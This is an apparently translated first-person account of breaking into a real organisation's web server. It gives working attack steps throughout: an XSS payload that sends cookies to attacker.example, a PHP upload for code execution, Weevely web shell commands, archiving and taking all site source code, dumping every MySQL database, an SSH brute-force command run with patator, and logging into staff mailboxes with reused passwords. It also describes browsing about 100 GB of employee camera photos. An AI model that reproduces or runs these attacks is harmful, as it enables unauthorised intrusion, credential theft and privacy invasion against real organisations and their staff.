Website hacking is one of the most common types of cybercrime, for a simple reason: sites have plenty of vulnerabilities, and exploits exist for them. The most common goal of a break-in is to place malicious code on the site that can infect its visitors. Sites are also often hacked in order to steal confidential data, such as a customer database. Sometimes the purpose of a commissioned hack is to take the site down, actually destroying its content. And sometimes sites are hacked out of plain hooliganism: the attackers deface pages or post their "joke" content on the site.
1. Web application vulnerability search.
The site was a web application written from scratch.
To use its functions you need to enter a login and password, but guest access is provided: the guest credentials are printed right on the home page.
The "actions" created in the application have a title and body text.
The saved fields turned out not to filter special characters and keywords, so an XSS vulnerability was quickly found and confirmed – i.e. you type something like <script>alert(1)</script> into a field, and the script runs when the saved record is opened.
With this vulnerability you can, for example, steal cookies of other users.
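A sketch of what such a payload might look like (the collector host attacker.example is a placeholder I made up, not from the original): the injected script makes the victim's browser send its cookies to a server the attacker controls.

```shell
# Build a cookie-stealing XSS payload (sketch; attacker.example is a
# made-up collector host). The <script> is what gets typed into the
# unfiltered field; when another user opens the record, their browser
# silently requests the attacker's URL with the cookies appended.
ATTACKER="http://attacker.example/collect"
PAYLOAD="<script>new Image().src='${ATTACKER}?c='+encodeURIComponent(document.cookie);</script>"
echo "$PAYLOAD"
```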
But the problem is that, apparently, the History is different for each user.
The best I can do in this situation is steal cookies from users with exactly the same rights as mine – i.e. only from users who log in under the guest account.
It is possible that the admin has a History covering all users – but that is not a given.
Plus we would have to figure out how to provoke him into opening the History – it may well be that the next time he looks at it will be in a year, or two, or never.
Since the special characters are clearly not filtered, and the data is most likely stored in a database, there may well be a SQL injection vulnerability here that would allow the database to be extracted.
But I didn't get around to checking it – a much easier vulnerability was found: unrestricted file upload.
The point is that when I created a new action, I had several input fields available, in which I found the XSS and could have probed for SQL injection.
But when I opened a saved action from the History, another field appeared on the page – for uploading a file!
My joy was moderate: on the one hand, many sites let you upload files, but thanks to restrictions on the extensions of uploaded files, and on how they can be accessed, it is almost always impossible to upload code that the server will execute.
But the careless filtering of the text fields gave me some hope.
I created the file – a PHP script with a call to phpinfo().
And uploaded it to the server.
The server showed me the link to this file. So the file is uploaded!
I clicked on the link and, instead of the file being downloaded or displayed, it was executed: I saw the output of the phpinfo() function.
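The probe file itself can be reproduced in one line (a sketch; info.php is my name for it, the original file name was not given):

```shell
# A minimal PHP probe: when the server executes it rather than serving
# it as text, it dumps the full interpreter configuration, proving
# remote code execution.
printf '<?php phpinfo(); ?>\n' > info.php
cat info.php
```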
So what are the programmer's mistakes?
Such a careless programming style must not be combined with a publicly available account.
It would have taken much longer to find and exploit these vulnerabilities if the login credentials had not been written on the home page.
Above all: when writing code, you should always filter input data and restrict which files can be uploaded to the server.
Even if you program "for yourself" and keep the files on a local server on your own computer, you can still get into trouble: someone can connect to your web server over the local network (e.g. when you are on a shared network), or your computer can be reached directly via a white (public) IP.
Obviously, for a public site, the code must be written with security constantly in mind.
2. Uploading a backdoor to the server.
To begin with I wanted to use the simplest option – c99unlimited.php. It is a web shell with a file manager, convenient for wandering through directories and downloading files.
But it didn't work for me – it returned error 500.
The server apparently has some incompatibility with it.
That is no problem at all: there are plenty of different shells in the webshells collection – you could sit and pick one you like for a long time, but I decided to use my even bigger favourite, Weevely.
I have a real soft spot for this tool )))
And since it has a command-line interface, I like it all the more.
We generate an agent and connect to it (typical Weevely usage; the path and password here are placeholders):
weevely generate PASSWORD agent.php
weevely http://SITE/path/agent.php PASSWORD
Browsing the server through the backdoor.
Let’s see what my rights to this folder are:
drwxrwxrwx 2 XX1 root 4096 Apr 21 14:16 .
From this information it follows that the owner of the folder is the user XX1 – but everyone has write permission to it.
Who am I here, by the way?
I am working as the user www-data.
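The two checks above can be sketched together (the demo tree below stands in for /var/www on the real server; XX1/tmp is made world-writable like the folder found there):

```shell
# Who are we, and where can we write?
whoami
demo=$(mktemp -d)          # stand-in for /var/www
mkdir -p "$demo/XX1/tmp"
chmod 0777 "$demo/XX1/tmp"
# -perm -0002 matches anything the "other" class can write to
find "$demo" -type d -perm -0002
```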
4. How to download the source code of the sites from the server.
Oh yes – why did I suddenly rush off looking for a world-writable folder? The thing is, I need to download the files with the source code for further analysis "in a calm environment". There are a lot of these files, and downloading them one by one would take a long time. So the plan is to pack all the files into an archive, and download the archive.
In principle, you can use the folder /tmp, which is always writable by everyone. But from /tmp I can download only with Weevely. If instead I save the archive to a web server folder, I can fetch it directly with a browser or any download manager. This matters especially for a very large file: you may need to resume the download after a broken connection, which can't be done with Weevely on the command line.
Since we are in the folder /var/www/XX1/tmp, the web server folder is obviously /var/www/. Let's see what's in it:
ls -l /var/www/
There are 14 folders of other sites in it in total, but I can't show them here.
A glance at my cheat sheet: to pack files into an archive with the zip command, you additionally need the -r option to recurse into directories; the command looks like this:
zip -r new_archive_name.zip directory_to_archive
The directory to archive is /var/www/; for now I will save the archive to /tmp (not to a folder with the sites, because then we would be saving the archive into a folder that is itself being added to that archive – this may cause an error).
In practice the archive was created with tar (f – this option is followed by the path and file name of the archive):
tar czf /tmp/archive.tgz /var/www/
Then we move the archive to a folder on the web server, where it becomes downloadable even with a browser:
mv /tmp/archive.tgz /var/www/XX1/tmp
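The whole step can be rehearsed on a demo tree (the paths below are stand-ins for /var/www and /var/www/XX1/tmp from the text):

```shell
# Archive to /tmp first, so the archive cannot end up inside itself,
# then move it into a web-accessible folder for direct download.
src=$(mktemp -d)   # stands in for /var/www
web=$(mktemp -d)   # stands in for /var/www/XX1/tmp
mkdir -p "$src/site1"
echo '<?php // site source ?>' > "$src/site1/index.php"
tar czf /tmp/demo_archive.tgz -C "$src" .
mv /tmp/demo_archive.tgz "$web/"
tar tzf "$web/demo_archive.tgz"   # list the archive to verify it
```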
To find out the size of all the subfolders in /var/www/:
du -sh /var/www/*
If you need to archive only some of the folders, this is done with a command of the form:
tar czf archive.tgz folder_to_archive_1 folder_to_archive_2 folder_to_archive_3 folder_to_archive_4
5. How to find out which sites are running on the server.
The source code is a very valuable trophy and will help us a lot. But, as I said, there are many site folders on this server – that is, it hosts many sites.
A summary of all loaded settings and parsed virtual hosts can be printed with the -S option. And with -t -D DUMP_INCLUDES you can see all the configuration files in use. The catch is that the web server binary may be called either httpd or apache2 depending on the system: on Debian derivatives it is apache2, on Arch Linux derivatives it is httpd. But there is no problem just trying both commands and seeing which one works:
httpd -t -D DUMP_INCLUDES
apache2 -t -D DUMP_INCLUDES
As I said, under normal conditions these options should show all the configuration files and all the virtual hosts. But it seems the programmer who wrote the site's code also had a go at configuring the web server – instead of the expected information I only got an error message about one of the configuration files: an SSL certificate file is missing. Incidentally, this means that after a reboot of the machine, or just of the web server, Apache in theory will not start, because this is (supposedly) a fatal error.
Okay, let’s check manually. If the binary is called apache2, then the configuration files are stored in /etc/apache2/.
The main Apache configuration file is /etc/apache2/apache2.conf.
The folder /etc/apache2/conf-available contains additional configuration files, and in /etc/apache2/conf-enabled you can see which of them are enabled.
In the folder /etc/apache2/mods-enabled, you can see which Apache modules are enabled.
The folder /etc/apache2/sites-available contains the configurations of all the sites, and in /etc/apache2/sites-enabled you can see which sites are currently active.
Sorry, I can't show you the contents; I can only say that there are 18 configuration files in sites-available. Each site's file has at least 2 mandatory directives:
ServerName – this is the host name, actually the domain of the site (sometimes a subdomain)
DocumentRoot – the path on the server to that host's files
This technique allows you to find out which other sites this server hosts and where the source code for each of them resides on the server.
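Collecting those pairs is a one-liner; the demo config below is invented to stand in for /etc/apache2/sites-available/*:

```shell
# Pull ServerName/DocumentRoot out of every vhost config at once.
conf=$(mktemp -d)   # stands in for /etc/apache2/sites-available
cat > "$conf/000-example.conf" <<'EOF'
<VirtualHost *:80>
    ServerName example.test
    DocumentRoot /var/www/example
</VirtualHost>
EOF
grep -rhE '^[[:space:]]*(ServerName|DocumentRoot)' "$conf"
```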
Using the above technique (analysing the virtual hosts and viewing the contents of the site folders), we find the address of phpMyAdmin. phpMyAdmin might not have existed at all – that would be fine, you can work with the database through the console.
The main thing is to analyse the source code of the sites and find the credentials there. To simplify this task, you can search through the contents of the files, paying special attention to lines that establish database connections or define passwords, as well as to files with descriptive names like connectdb.php.
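A sketch of such a search (the grep patterns are my guesses at typical PHP connection code, not taken from the actual site):

```shell
# Recursively search a source tree for database-connection lines.
src=$(mktemp -d)   # stands in for the downloaded site sources
printf '<?php $db = mysqli_connect("localhost", "user", "secret"); ?>\n' > "$src/connectdb.php"
grep -rnE 'mysqli?_connect|new PDO|DB_PASSWORD' "$src"
```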
Weevely has a command to connect to MySQL from the command line:
:sql_console -user USER -passwd PASSWORD -host localhost
Or, if MySQL allows remote connections, you can connect to the host directly:
mysql -u USER -pPASSWORD -h SERVER_IP
Inside, you can list the databases, then a database's tables and their contents (standard MySQL statements):
SHOW DATABASES;
USE database_name; SHOW TABLES; SELECT * FROM table_name;
Or dump everything at once:
mysqldump -u USER -pPASSWORD --all-databases > all-databases.sql
We now have usernames and passwords (as well as emails and other typical profile information). The administrator's password for logging in to the service is the same as the root password for MySQL. Let me remind you, in case you're confused: we found the MySQL password in the source code of the site files, and the service (site) administrator's password in the database. They just turned out to be the same.
But even more interesting is the analysis of all the user passwords – almost all of them are six-digit numbers! Apparently, the credentials were generated and issued by the administrator, and an administrator tends to create passwords to a pattern – let's take that into account. That is, if we have to brute-force other services on this server (and we will), I already know what the dictionary will look like: the full list of six-digit numbers. And since passwords get reused, it also makes sense to try our existing logins and passwords against other services.
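The pattern is easy to confirm mechanically (the password list below is invented for the demo; the real dump stays private):

```shell
# Count how many passwords are plain six-digit numbers.
cat > pw.txt <<'EOF'
483920
117345
qwerty
902211
EOF
grep -cE '^[0-9]{6}$' pw.txt   # → 3
```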
The DBMS password has been obtained, access to the databases gained – the databases can even be edited
User passwords from the services have been obtained
Password analysis has revealed a clear pattern
Other sites have been found and their source code has been obtained
It might seem we could already write a report for the site's owner and wrap up this security assessment.
But such a report would be incomplete.
These days there are cameras everywhere: snacks get stolen in the break room, employees don't work at work, in the toilets people miss the urinal… This organisation is no exception. It was not for nothing that I showed earlier how to check folder sizes and how to selectively archive folders on the web server: two hosts turned out to be storage for dozens of gigabytes of photos. Everything there is decent; it's just that the cameras have built-in motion sensors, so recording only happens when someone is in the room. One of the cameras is installed in the break room – where the tea, the food and the TV are. So if you flip through these photos at speed (it turns into a video), you get the surreal impression that the people in this organisation never stop eating… The day goes like this: the sun rises, the first people come in and start drinking coffee, then they start eating, then they leave and others start eating, then more people come and start eating, then they leave and others come with their food and eat again, and so it repeats until sunset… The next day is exactly the same – people eat, eat, eat, and so on for almost 100 GB…
And the web interface with a weak password for viewing all this "goodness" sits on a subdomain of the site, accessible from the global Internet.
7. Searching for weak server settings.
So, we have already shaken everything we can out of the websites – source code, databases, user passwords.
Now let's take a look at the server itself: what we have access to, which settings are weak, what information we can gather about the system, its users and running services.
We run the enumeration and wait for the results.
There is a lot of information. The system and kernel information can be used to search for privilege-escalation exploits.
Information was obtained about users who have logged in (name, IP, date of last login) – their names can be used for SSH brute force (password guessing). And one of the users has a local address 10.*.*.* – this gives us a hint about the structure of the local network.
It shows which of the users is the administrator, as well as the accounts that have recently used sudo (i.e. who has the right to execute commands with elevated privileges – such accounts are of primary interest).
Information about the network interfaces was collected and the local IP shown – the network can be scanned for other connected devices.
The listening ports (the ones you can connect to) were collected – there are a lot of them. They are worth checking, because there may be interesting services behind them.
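The same list can be pulled at any time with ss from iproute2 (or netstat on older systems):

```shell
# List listening sockets: -t TCP, -u UDP, -l listening only,
# -n numeric addresses and ports instead of names.
ss -tuln
```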
The information about the running processes shows that a mail server, a proxy, a DNS server and an IP camera service are running.
The version numbers of the popular services were collected – in case we want to look for exploits.
Among the interesting files, nmap suddenly turns up – the host can be scanned directly from itself, which gives very fast results.
8. Brute force SSH and FTP.
Two users with administrator rights were found on the server: root and one more, whose name I can't give you.
Analysis of the source code of the web interfaces for viewing the photos saved from the cameras yielded another password – also six digits. I noticed that the owner of the web server folders where the photos are stored is not Apache (not www-data) but other users. It turned out that FTP credentials exist for them, that you can also log in via SSH with them, and that in both cases the password is the same administrator password that fits MySQL root and the service on the site. Unfortunately, these users have no right to execute commands via sudo. That is, I already had access to everything they have access to (except that under these users you can edit the site files).
But the saddest thing is that this administrator password fits neither that Linux user nor the root account. To be honest, at first I was even surprised – it fits everything else, but not here… Apparently, the passwords for these users were set by someone else.
Let's assume that the password is again six digits long. Then let's generate the dictionary with maskprocessor (one ?d per digit):
maskprocessor ?d?d?d?d?d?d > dig.pass
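If maskprocessor is not to hand, plain coreutils will generate the same dictionary (-w pads every number with zeros to equal width):

```shell
# All six-digit strings, one per line: 000000 … 999999.
seq -w 0 999999 > dig.pass
head -n 2 dig.pass    # → 000000 and 000001
wc -l < dig.pass      # → 1000000
```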
For brute force I prefer patator.
I wanted to run the password guessing directly from the server. Python was installed there, but paramiko was not, so I got an error:
ERROR: paramiko (http://www.paramiko.org/) is required to run ssh_login.
As it later turned out, someone had logged in to the server as root and the file /etc/ssh/sshd_config had been changed. I don't know whether this was related to my activity or whether the admin just decided to "tighten up security". I took a look at the SSH configuration file:
The most important part of this tightening-up is a directive of this kind:
Port 40022
That is, instead of port 22, the SSH server now runs on port 40022 – apparently so that no one would guess.
To deal with this, you need to specify the non-standard port in patator:
patator ssh_login host=IP port=40022 user=root password=FILE0 0=dig.pass -x ignore:mesg='Authentication failed.'
If the run is interrupted before completing, patator will print something like:
If you want to continue from where it stopped, the next time you run patator add the --resume line it printed, like this:
patator ssh_login host=IP port=40022 user=root password=FILE0 0=dig.pass -x ignore:mesg='Authentication failed.' --resume 3591,3577,3564,3592,3572,3588,3588,3568,3584,3588
Successfully recovering the password of the Linux root user, or of a user with the right to execute commands via sudo, means the most complete compromise of the server – a total hack. There is nothing deeper left to break: any settings, any files, any actions on the server become available.
9. Hacking the mail.
As I said, the nmap program was installed on the server, so I decided to study the server's local network.
I looked at the local IP:
I ran a scan but found nothing:
nmap -sn 192.168.144.0/24
tracepath -n ya.ru
showed that the server was connected directly to the ISP – which, in general, should have been obvious: it is the same server, and all its addresses are external IPs.
Among other things there was the string Kerio Connect 9.2.1 and an open ssl/http port fingerprinted as Kerio MailServer http config. As Googling showed, this is a mail service.
I had already seen a mention of the mail service in the information on one of the hosts (subdomains) – it said that the mail had by now moved to Yandex, so I had somehow quickly forgotten about it.
But it turned out that if you enter the IP with the right port number in the browser, a login form for the organisation's mail opens. I tried several accounts (username and password) from the database – many of them worked.
Including the administrator's password, which also worked for the administrator's mailbox.
The mailbox had been used for several years, but had been abandoned for almost a year.
The importance of hacking mail hardly needs explaining: information accumulated over years, data about employees (on top of their photos, extracted a little earlier), opportunities for social engineering – so I decided that this was enough for this server.
You may think that this story is just a list of the most childish and ridiculous mistakes, which only a novice schoolkid programmer and administrator could make, and that this does not happen in real life. It does… This is an absolutely real case, a real server.
Unfortunately, I can't say anything even in general terms about the context of this case. I will only note that the organisation that owns this server is in Moscow, and it is not for nothing that a big tricolour hangs on its wall.
You may notice that I used specialised utilities to a minimum. Almost all the "hacks" consisted of knowing where to look and what to look at, and simply looking. So training in the security auditing of sites (hacking) is not only about learning specialised utilities. First of all, you need to understand the processes involved. If we are talking about sites, you need to understand how they function. I can't imagine how a website penetration test could be done without PHP programming skills and at least some experience creating websites and web applications (CMSs, engines and so on). And if the pentest continues onto the server, there is simply nothing to be done without such peaceful skills as:
understanding of the web server and the ability to configure it
understanding of the Linux operating system and its internals
knowledge of the command line and at least the most popular Linux commands (utilities).